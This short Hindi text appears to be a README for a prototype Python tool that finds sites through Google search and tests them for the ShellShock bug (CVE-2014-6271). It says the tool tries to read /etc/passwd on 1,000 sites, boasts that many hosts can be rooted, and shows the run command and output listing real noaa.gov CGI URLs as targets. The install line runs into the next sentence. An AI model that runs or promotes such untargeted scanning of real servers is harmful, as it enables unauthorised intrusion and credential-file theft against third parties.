
गूगल का उपयोग करके "ShellShock" (CVE-2014-6271) के लिए साइटों को स्कैन करना
sudo pip install shellमैं पहले 1000 साइटों को खोजने और /etc/passwd प्राप्त करने का प्रयास करने के लिए Google का उपयोग करता हूं। परीक्षण के बाद, बहुत सारे होस्ट हैं जिन्हें रूट किया जा सकता है!!!!
वैसे, यह केवल एक प्रोटोटाइप है, इसमें गलत सकारात्मक परिणाम हैं।
आउटपुट इस प्रकार है:
यदि दूसरा फ़ील्ड !!! है, तो आप SHELL प्राप्त कर सकते हैं!
$ python shellshock.py
0 --- http://nomad3.ncep.noaa.gov/cgi-bin/pdisp_sst.sh
1 --- http://nomad5.ncep.noaa.gov/cgi-bin/pdisp_gfs.sh?ctlfile=gfs_00z.ctl&povlp=noovlp&ptype=map&dir